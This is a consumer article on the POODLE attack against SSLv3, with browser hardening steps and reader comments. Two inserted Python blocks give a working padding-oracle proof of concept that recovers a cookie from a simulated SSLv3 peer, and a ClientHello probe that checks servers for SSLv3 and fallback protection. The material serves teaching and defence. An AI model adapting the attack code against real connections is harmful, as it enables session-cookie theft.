
When do people not like a puppy? When they know it’s not a puppy, but an attack on their browser’s encrypted connections aimed at stealing their vital information. The POODLE (Padding Oracle On Downgraded Legacy Encryption) we’re talking about is a serious security attack.

Because it attacks the protocol itself rather than any one program, it can affect every web browser, and therefore any one of us. Let’s find out what POODLE is, what it does, and what you can do to prevent it from biting you.

Background Info

To understand POODLE, you need to know a bit about SSL and TLS. They are two cryptographic protocols that were developed to protect your important web communications. When you go to a website and you see HTTPS:// before the web address, you’re using SSL/TLS. SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are closely related: TLS 1.0, published in 1999, was the successor to SSL 3.0, and the versions since then (TLS 1.1 and 1.2) fixed further weaknesses. Most people still lump them together and call the whole family SSL. TLS replaced SSL as the standard more than a decade ago, yet almost every browser and server still supports SSLv3 for the sake of compatibility. That lingering support is what makes POODLE dangerous.

When you visit a website, the computer that serves you the page (the web server) usually speaks several versions of the protocol, anywhere from TLSv1.2, the most recent and most secure, down to SSLv3, the oldest still in use and the weakest. Your browser and the server negotiate the highest version both support so they can talk securely. If that negotiation fails, most browsers quietly retry with a lower version, all the way down to SSLv3. This fallback was meant to cope with buggy servers and network equipment, but it is exactly what a man-in-the-middle attacker abuses in POODLE: by interfering with the connection attempts, they can push the browser down to SSLv3 even though both sides support something better.

What Does POODLE Do?

POODLE has two parts. First, the attacker, who must sit between your browser and the server (on the same public Wi-Fi, for example), sabotages the connection attempts until the browser falls back to SSLv3. Second, they exploit a flaw in how SSLv3 pads data before encrypting it with a block cipher in CBC mode: the padding bytes are never checked, only the final length byte. By tricking your browser into sending many near-identical requests (JavaScript injected into an ordinary HTTP page will do that) and moving encrypted blocks around in each one, the attacker learns from the server’s accept-or-reject response whether their guess for one byte was right. One byte of a secret such as a session cookie can be recovered this way every 256 requests on average, and a whole cookie within a few thousand. Cookies are often used to store login sessions and other information that can be personal and sensitive in nature. With your session cookie, the attacker can act as you on that site, which is never anything good.

On the upside, POODLE is not an easy attack to pull off. The attacker needs a privileged position on the network, has to get your browser to send hundreds of requests for each byte they recover, and gets only the secrets your browser sends to that one site while the attack runs. So it is something to be concerned about, but it isn’t as bad as the recent Heartbleed issue, which handed server memory to anyone on the Internet who asked for it.
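Here is how the padding-oracle half of the attack works in practice, as an added example that is not part of the original article. It simulates an SSLv3 record layer (MAC, then pad, then encrypt in CBC mode) with a toy Feistel cipher standing in for AES or 3DES, a “browser” that encrypts requests whose prefix and suffix lengths the attacker controls, a “server” that reveals only whether it accepted a record, and an attacker that recovers a cookie value one byte at a time. The cookie value, the keys, the 16-byte block size and HMAC-SHA256 as the record MAC are all assumptions made for the demo.

```python
import hmac
import hashlib
import os

BLOCK = 16      # block size assumed for the demo (AES-sized; the SSLv3 padding flaw is the same for 8)
MAC_LEN = 32    # HMAC-SHA256 stands in for SSLv3's record MAC


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class ToyBlockCipher:
    """4-round Feistel network on 16-byte blocks with an HMAC-SHA256 round function.
    It stands in for AES/3DES: a keyed permutation is all CBC mode needs."""

    def __init__(self, key):
        self.round_keys = [hmac.new(key, bytes([i]), hashlib.sha256).digest() for i in range(4)]

    @staticmethod
    def _f(k, half):
        return hmac.new(k, half, hashlib.sha256).digest()[:8]

    def encrypt_block(self, block):
        l, r = block[:8], block[8:]
        for k in self.round_keys:
            l, r = r, xor(l, self._f(k, r))
        return l + r

    def decrypt_block(self, block):
        l, r = block[:8], block[8:]
        for k in reversed(self.round_keys):
            l, r = xor(r, self._f(k, l)), l
        return l + r


class SSLv3Peer:
    """SSLv3-style record layer: MAC-then-pad-then-encrypt in CBC mode.
    The padding bytes are arbitrary and, crucially, never checked on receipt."""

    def __init__(self, enc_key, mac_key):
        self.cipher = ToyBlockCipher(enc_key)
        self.mac_key = mac_key

    def seal(self, data):
        body = data + hmac.new(self.mac_key, data, hashlib.sha256).digest()
        pad_len = BLOCK - 1 - len(body) % BLOCK           # 15 when data+MAC fills whole blocks
        body += os.urandom(pad_len) + bytes([pad_len])    # random padding + length byte
        iv = os.urandom(BLOCK)
        out, prev = [iv], iv
        for i in range(0, len(body), BLOCK):
            prev = self.cipher.encrypt_block(xor(body[i:i + BLOCK], prev))
            out.append(prev)
        return b"".join(out)

    def open(self, record):
        """Returns the data, or None if the record is rejected (that is the oracle)."""
        blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
        body = b"".join(xor(self.cipher.decrypt_block(c), p) for p, c in zip(blocks, blocks[1:]))
        pad_len = body[-1]
        if pad_len >= BLOCK or len(body) < pad_len + 1 + MAC_LEN:   # only the length byte is validated
            return None
        body = body[:len(body) - pad_len - 1]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        expected = hmac.new(self.mac_key, data, hashlib.sha256).digest()
        return data if hmac.compare_digest(mac, expected) else None


def poodle_recover(secret_len, send_request, accepts, max_tries=50000):
    """Attacker side. send_request(prefix_len, suffix_len) makes the victim browser encrypt
    prefix + SECRET + suffix (the attacker's script picks both lengths); accepts(record)
    is the only thing the attacker learns from the server."""
    recovered, tries = bytearray(), 0
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK                           # secret[j] becomes the last byte of a block
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK    # data+MAC fills whole blocks: padding is a full block
        target = 1 + (prefix_len + j) // BLOCK                         # record block holding secret[j] (block 0 is the IV)
        while True:
            tries += 1
            if tries > max_tries:
                raise RuntimeError("oracle never accepted; is the padding really unchecked?")
            rec = send_request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            forged = b"".join(blocks[:-1]) + blocks[target]            # replace the padding block with the target block
            if accepts(forged):
                # the server decrypted P_target XOR C_{target-1} XOR C_{n-1}; its last byte was BLOCK-1
                recovered.append((BLOCK - 1) ^ blocks[target - 1][-1] ^ blocks[-2][-1])
                break
    return bytes(recovered), tries


# ---- demo with a constructed cookie value and fresh random keys ----
SECRET = b"sid=7f3a9c"
_enc_key, _mac_key = os.urandom(32), os.urandom(32)
browser, server = SSLv3Peer(_enc_key, _mac_key), SSLv3Peer(_enc_key, _mac_key)


def victim_request(prefix_len, suffix_len):
    # a request whose URL length and body length the attacker's script chose; the browser adds the cookie
    return browser.seal(b"/" * prefix_len + SECRET + b"B" * suffix_len)


def server_accepts(record):
    return server.open(record) is not None


def run_demo():
    return poodle_recover(len(SECRET), victim_request, server_accepts)


if __name__ == "__main__":
    got, tries = run_demo()
    print("recovered %r after %d requests (%.0f per byte)" % (got, tries, tries / len(SECRET)))
```

Each accepted forgery costs about 256 requests on average, which is where the article’s “hundreds of tries” comes from; the attacker never touches the key, only the server’s yes/no answer. The same swap fails against TLS 1.0 and later because they check every padding byte, so the forged block is rejected whatever its last byte happens to be.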


How Can I Protect Myself from POODLE?

Fortunately, it’s a fairly easy thing to do. First things first, let’s see whether you are POODLE vulnerable. Simply go to the POODLETest.com website. If you see a poodle, you have some cleaning up to do. If you see the Springfield Terrier, your browser is good to go. For those who are more tech savvy, check out Qualys SSL Labs’ SSL Client Test, which provides more in-depth details. Both sites test the browser you load them in, so repeat the test in every browser you use.

poodle-not-poodle

The underlying principle is to disable SSLv3 support in your web browser. If it’s disabled, POODLE cannot downgrade your browser to it, no matter how many connection attempts the attacker breaks. Let’s look at how to do this in Chrome, Internet Explorer, and Firefox.

Be aware that a small number of web sites still only support SSLv3. If you disable it, those sites will stop working over HTTPS altogether, because there is no version left that both sides can agree on. It wouldn’t hurt to send that company a nice e-mail with a link to this article so they are aware of the issue. Hopefully, they will upgrade to TLS and all will be good again.

Chrome

Find the shortcut that you use to launch Chrome. Right-click on it and then click on Properties.

chrome-poodle-step-1

When the Properties window opens, find the field named Target. There should be a long path to where the Chrome file is located. It should look like: “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” or “C:\Program Files\Google\Chrome\Application\chrome.exe”.

chrome-poodle-step-2

Click just after the last quotation mark and hit your space bar to create a space. Now type in the following (two ordinary hyphens, not a dash):

--ssl-version-min=tls1

You could copy and paste that from here, too. That tells Chrome to use TLSv1 as the lowest protocol version it will accept. Click on the Apply button at the bottom of the window, and the next time you open Chrome from that shortcut, it will be POODLE proofed. The flag only applies to that shortcut: if you also launch Chrome from a taskbar pin, the Start menu, or links in other programs, edit those shortcuts too, or confirm with the test sites above that the setting took effect. Google has also said it plans to remove SSLv3 support from Chrome completely in the coming months.

Internet Explorer

Open your Internet Explorer browser and click on the Settings icon. It’s the one that looks like a gear. Now click on Internet options. A new window will open.

internet-explorer-ie-poodle-step-1


On the far right side, you will see a tab labelled Advanced – click on it. In the Settings area, scroll down until you see the options Use SSL 2.0 and Use SSL 3.0.

internet-explorer-ie-poodle-step-2

If there is a checkmark in those two boxes, uncheck them by clicking on them. Make sure that the boxes labelled Use TLS 1.0, Use TLS 1.1 and Use TLS 1.2 are checked. (If you don’t have all three of these TLS boxes, you should update your Internet Explorer.) Then click on the Apply button, and the OK button. Your Internet Explorer is now POODLE proofed. These checkboxes are stored per user, so repeat this for each account on the machine. Administrators who manage many PCs can push the same setting through Group Policy (the “Turn off encryption support” setting under Internet Explorer’s Advanced Page) or by setting the SecureProtocols registry value under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings to 2688, which enables TLS 1.0, 1.1 and 1.2 and nothing older.

Firefox

If you’re a fan of Firefox, here’s how to help the fox outsmart the POODLE. Simply go to Firefox’s SSL Version Control 0.2 Add-On page, then download and install the SSL Version Control 0.2 add-on. It’s that easy. If you would rather not install an add-on, open about:config, find security.tls.version.min and change it from 0 to 1: 0 means SSLv3 is the lowest version Firefox will accept, 1 means TLS 1.0.

firefox-poodle-ssl-version-control-add-on

Mozilla has also announced that its next version, Firefox 34, will disable support for SSLv3. However, that version isn’t due until sometime in November, according to their release schedule.

POODLE Will Be Pooched

Once the majority of people POODLE-proof their browsers and the majority of web servers stop offering SSLv3, POODLE will no longer be a problem. There is also a mechanism known as TLS_FALLBACK_SCSV that browser and web server developers can implement to close the downgrade path: when a browser retries a connection with a lower protocol version than it really supports, it adds this marker to its list of cipher suites, and a server that understands the marker refuses the connection if it would have accepted the higher version, so an attacker can no longer force the fallback. Unfortunately, it only helps when both the browser and the server support it, and that will take a while to roll out everywhere. Only then will SSLv3 go by the wayside, as it should have a decade ago. Spread the word and make the Web a safer place to be.
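To see what the test sites and TLS_FALLBACK_SCSV actually do on the wire, here is an added example in Python that is not from the original article. It builds a raw SSLv3 or TLS ClientHello, optionally including the TLS_FALLBACK_SCSV marker (cipher suite value 0x5600), and interprets the first record the server sends back: a ServerHello means the server accepted that version, a handshake_failure or protocol_version alert means it refused, and an inappropriate_fallback alert means the server understands TLS_FALLBACK_SCSV and rejected the downgrade. The four cipher suites offered, the default host name and the sample server responses are assumptions for the demo.

```python
import os
import socket
import struct

SSLV3, TLS10, TLS12 = (3, 0), (3, 1), (3, 3)
TLS_FALLBACK_SCSV = 0x5600           # RFC 7507 signalling suite: "this hello is a fallback retry"
# a handful of suites an SSLv3-era client would offer (values from RFC 2246 / RFC 3268); assumed for the demo
SUITES = [0x002F, 0x0035, 0x000A, 0x0005]   # AES128-SHA, AES256-SHA, 3DES-SHA, RC4-SHA
ALERTS = {40: "handshake_failure", 70: "protocol_version", 86: "inappropriate_fallback"}


def build_client_hello(version, fallback=False):
    """Raw ClientHello record without extensions, so it is valid for SSLv3 as well as TLS."""
    suites = SUITES + ([TLS_FALLBACK_SCSV] if fallback else [])
    body = bytes(version) + os.urandom(32) + b"\x00"             # client_version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                             # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # handshake type 1 = ClientHello
    return b"\x16" + bytes(version) + struct.pack("!H", len(handshake)) + handshake


def parse_server_response(data):
    """Classify the first record a server returns in answer to our hello."""
    if len(data) < 5:
        return ("error", "short or empty response")
    ctype, _major, _minor, length = struct.unpack("!BBBH", data[:5])
    payload = data[5:5 + length]
    if ctype == 0x15 and len(payload) >= 2:                          # alert record: level, description
        return ("alert", ALERTS.get(payload[1], "alert_%d" % payload[1]))
    if ctype == 0x16 and len(payload) >= 6 and payload[0] == 0x02:   # handshake record: ServerHello
        return ("server_hello", (payload[4], payload[5]))            # the version the server picked
    return ("error", "unexpected record type 0x%02x" % ctype)


def probe(host, port=443, version=SSLV3, fallback=False, timeout=5):
    """Send one hello and report what came back. Needs network access."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello(version, fallback))
        return parse_server_response(sock.recv(4096))


def verdict(host, port=443):
    """The two checks a scanner runs: does the server still speak SSLv3,
    and does it honour TLS_FALLBACK_SCSV on a pretended fallback from TLS 1.2 to TLS 1.0?"""
    sslv3 = probe(host, port, SSLV3)
    fallback = probe(host, port, TLS10, fallback=True)
    return {
        "sslv3_accepted": sslv3[0] == "server_hello" and sslv3[1] == SSLV3,
        "fallback_scsv_honoured": fallback == ("alert", "inappropriate_fallback"),
    }


if __name__ == "__main__":
    import sys
    print(verdict(sys.argv[1] if len(sys.argv) > 1 else "example.com"))
```

A server that answers the SSLv3 hello with a ServerHello and negotiates a CBC cipher is exposed to POODLE; one that answers the fallback hello with a ServerHello for TLS 1.0 instead of the inappropriate_fallback alert does not yet implement TLS_FALLBACK_SCSV, so it cannot stop a browser that lacks the fix from being pushed down.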

Image Credits: Angry Poodle, HTTPS Vector Image via Shutterstock.


  2. Gordon Edwards
    November 28, 2014 at 12:35 pm

    G'day Guy - I think you will like K-Meleon.

    On IE11... I use and really like Avast! anti-virus. However, of late they have started injecting their own certificates and re-signing root certificates as part of their Web Security, possibly part of their Browser Protection. One result of this was to make IE look like it was vulnerable to Poodle, which it is not. I *_think_* it was because the Avast bits made SSL look like TLS... I cannot be sure.

    I do know that the Avast Certificate made one SSL site look like a TLS site to IE, and resulted in a lot of trouble for other people in the chain which I now have to untangle...

    IE (OK, Microsoft!) is certainly not innocent. It has problems. But in this case, it is not guilty. It does support TLS if you tick the boxes, and it won't support SSL if you untick the boxes. IE11 can definitely be made Poodle-proof.

    Give K-Meleon a try. It's my primary browser, then Opera 12.17 (Presto engine!), and only then IE. We won't talk about Chrome/etc...

    Gordon.

  3. Guy
    November 27, 2014 at 12:19 pm

    Curious indeed. I'm not familiar with K-Meleon, I'm going to have to look that up.

    I'm not a big fan of IE in general, so if I couldn't be certain it could be protected I'd just stop using it. That's not an option for some people, I understand. For example, Outlook Web Access and SharePoint 3.0 work better on IE in general.

  4. Gordon Edwards
    November 27, 2014 at 10:03 am

    Just been over to Qualys. Interesting. My IE11 is listed as "Not Vulnerable", but...

    IE11 seems to have only 22 TLS ciphers available, including TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0xff), while K-Meleon has 31 TLS ciphers, NOT including the Empty cipher.

    Curious.

    Gordon.

  5. Gordon Edwards
    November 27, 2014 at 9:40 am

    Hi! Ummmm.... Disabling SSL in my IE11 doesn't work. It is still reported as vulnerable in every test I have been to, while my K-Meleon 74.24 and my Opera 12.17 are both safe. I am heading over to Qualys now...

    I unchecked the SSL boxes in Admin and in every User account on this box, and the box is routinely shut down every night. I use W7HPx64 SP1, and IE11 was installed via a Microsoft indirect update, over IE9>IE10>IE11...

    I am forced to the conclusion that IE is not Poodle-proof.

    Gordon.

  6. Guy
    October 29, 2014 at 7:26 pm

    D. Charles, anytime! We absolutely love it when our readers provide good, alternate ways to do things. That's how we all learn.

  7. D. Charles Pyle
    October 29, 2014 at 12:43 pm

    Good point. I just try to avoid plugins as much as possible because I have found that a number of them sometimes end up being broken by newer versions of Firefox. Well, at least people now have a couple ways to do this in Firefox. Thanks for allowing my post and for the article.

  8. D. Charles Pyle
    October 28, 2014 at 2:42 pm

    I think we do not really need the plugin. I think that you could also go to about:config in Firefox and change the security.tls.version.min from 0 to 1, couldn't we?

    • Guy
      October 28, 2014 at 8:30 pm

      D. Charles, good call, makes sense.
      I recommended the plugin to try to keep it simple for folks.
      You might be amazed at how many people would be terrified to even install a plugin.

  9. Aaron White
    October 28, 2014 at 1:41 pm

    Would there be an easy way of changing the settings for a large number of users in an office?
    Our company is in the Medical field, and since most medical websites seem to hang onto the old ways as long as possible, many websites still require Internet Explorer 8 or 9 to work effectively.
    Is there a simple way to block this on a large scale to make sure our information isn't compromised?

    • Guy
      October 28, 2014 at 8:33 pm

      Yes, there is, but it requires Administrator access at the server level.

      Usually the shortcut for IE is part of the All Users or Default profile, so they could make the change there, and it should propagate down the line.

      Or maybe something in Group Policy. Hadn't really looked into it, but those are the two places I'd start.

    • Aaron
      October 29, 2014 at 5:54 pm

      I've got the access side covered, I just wasn't sure if there was a way to prevent having to go desk to desk. I just got done with a headache password change for everyone, so the less running the better.

      Thanks!

    • Guy
      October 30, 2014 at 12:25 pm

      Hey Aaron, I totally understand. Been there, done that.

      Do keep in mind that by proofing your browser against the POODLE attack, some websites might not work.

      The web servers that those sites are on may only be using SSLv3. If that's the case, then for your browsers to communicate with them, the browser has to use SSLv3 as well.

      It's a real catch-22 situation. All you can do at that point is to call the owner of the web site and have them talk to their web host about upgrading the server to use at least TLSv1.

    • Aaron
      October 30, 2014 at 12:28 pm

      Thanks!
      I'll give that a look and see what we've got. The downside to Healthcare websites seems to be that many of them like to use the oldest versions of IE possible, so a lot of our copies of IE have already been rolled back to 8 or 9.

  10. pym
    October 27, 2014 at 5:04 pm

    I have Chrome. Poodletest showed a terrier. Qualys said agent is vulnerable. I added onto the target field, then went back and checked poodletest and then Qualys and there is no change in the Qualys. Help, I am a computer illiterate senior.

    • Guy
      October 27, 2014 at 8:42 pm

      I suspect that there might be a typo or something missing from your target field.
      Best to double-check that first.

      Then once you are sure it is correct, completely close out Chrome. Possibly even restart your computer. (Chrome often leaves stuff running in the background that you can't see.)

      Then try the POODLE tests again.

  11. dragonmouth
    October 26, 2014 at 2:28 pm

    " Simply go to Firefox’s SSL Version Control 0.2 Add-On page, then download and install the SSL Version Control 0.2 add-on."
    The add-on is not necessary for the Linux version of Firefox. Shortly after POODLE was announced, Linux distro developers issued a Security Update. No matter what distro you are running, just apply the latest updates and you should be safe from POODLE bite.

    • Guy
      October 26, 2014 at 8:39 pm

      That's good to know! Thank you.

  12. Allan
    October 25, 2014 at 6:54 pm

    I do not know why my comment did not appear, but here goes again. I have followed the instruction, but poodletest.com says I am vulnerable in Firefox and Chrome, whereas Qualys says both are not vulnerable. Confused.

    • Guy
      October 26, 2014 at 8:43 pm

      You may need to completely shut down both browsers before running the tests again, like dragonmouth suggests.

    • Allan
      October 27, 2014 at 11:21 am

      Did all that, several times, deleted cache, did it again, still the same result - poodletest.com says vulnerable, Qualys says not.

    • Guy
      October 27, 2014 at 1:04 pm

      Odd. I'd be more inclined to trust the Qualys analysis then.

  13. Allan
    October 25, 2014 at 6:32 pm

    I do not understand. First I checked vulnerability at poodletest.com, it says I am vulnerable, so as I use Firefox 33.0.1 I clicked the link for the SSL Version Control. Problem solved. No, still vulnerable. Checked through Qualys SSL Labs, and I'm not vulnerable according to them but still vulnerable according to poodletest.com after adding the Firefox add-on.

    Did what was listed for chrome and am still vulnerable in both tests.

    What's next?

    • dragonmouth
      October 26, 2014 at 2:22 pm

      Restart your browser then do the tests.

  14. Guy
    October 25, 2014 at 6:25 pm

    I'd have to see the test results from them to say for certain.

    Nonetheless, if you do the browser changes in the article, you should test 'not vulnerable' on both sites.

  15. Pat
    October 25, 2014 at 4:31 pm

    The one test site said I was not vulnerable and the other said I was. What's up with that?

    • Allan
      October 25, 2014 at 7:48 pm

      I get the same result, poodletest says vulnerable, Qualys says not.
